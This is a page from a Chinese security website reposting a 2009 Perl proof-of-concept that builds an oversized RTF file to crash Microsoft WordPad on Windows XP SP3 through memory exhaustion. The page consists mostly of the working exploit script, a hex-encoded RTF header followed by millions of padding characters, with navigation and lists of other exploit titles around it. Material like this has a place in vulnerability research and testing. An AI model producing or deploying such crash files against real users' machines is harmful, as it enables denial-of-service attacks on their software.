首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS Wordpad on winXP SP3 Local Crash Exploit
来源:Hellcode Labs 作者:murderkey 发布时间:2009-08-13  

#!/usr/bin/perl
#Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
#Works on WinXP SP3!
#bug found by murderkey in Hellcode Labs.
#exploit coded by karak0rsan aka musashi
#Hellcode Resarch
#just a fuckin' lame 0day bug for fun!

$file = "hellcoded.rtf";
$header =
"\x7b\x5c\x72\x74\x66\x31\x5c\x61\x6e\x73\x69\x5c\x61\x6e\x73\x69\x63\x70\x67\x31\x32".
"\x35\x34\x5c\x64\x65\x66\x66\x30\x5c\x64\x65\x66\x6c\x61\x6e\x67\x31\x30\x35\x35\x7b".
"\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c\x66\x73\x77\x69\x73\x73\x5c\x66".
"\x63\x68\x61\x72\x73\x65\x74\x31\x36\x32\x7b\x5c\x2a\x5c\x66\x6e\x61\x6d\x65\x20\x41".
"\x72\x69\x61\x6c\x3b\x7d\x41\x72\x69\x61\x6c\x20\x54\x55\x52\x3b\x7d\x7d\x0a\x7b\x5c".
"\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20".
"\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x31\x35\x3b\x7d\x5c\x76\x69\x65\x77\x6b\x69".
"\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c\x66\x30\x5c\x66\x73\x32\x30";

$subheader = "\x5c\x41\x41\x41\x41\x41\x5c\x41\x41\x41\x41\x5c\x70\x61\x72\x0a\x7d\x0a\x00";
$ekheader = "\x5c\x70\x61\x72\x0a";
$buffer = "A" x 578001;
$buffer2 = "A" x 289000;
$buffer3 = "A" x 18186;
$buffer4 = "A" x 863973;
$buffer5= "A" x 578000;
$memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.$subheader;
   open(file, '>' . $file);
   print file $memory;
   close(file);
print "File PoC exploit has created!\n";

exit(); */
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy Music Player 1.0.0.2 (wav
·Gazelle CMS 1.0 Multiple Vulne
·2WIRE Gateway Authentication B
·Easy Music Player 1.0.0.2 (wav
·Easy Music Player 1.0.0.2 (wav
·Embedthis Appweb 3.0b.2-4 Remo
·FTPShell Client 4.1 RC2 Name S
·Wordpress <= 2.8.3 Remote Admi
·VLC Media Player 1.0.0/1.0.1 s
·yPlay Player version 1.0 local
·pIPL 2.5.0 (.PLS /.PL) Univers
·EmbedThis Appweb v3.0B.2-4 Mul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved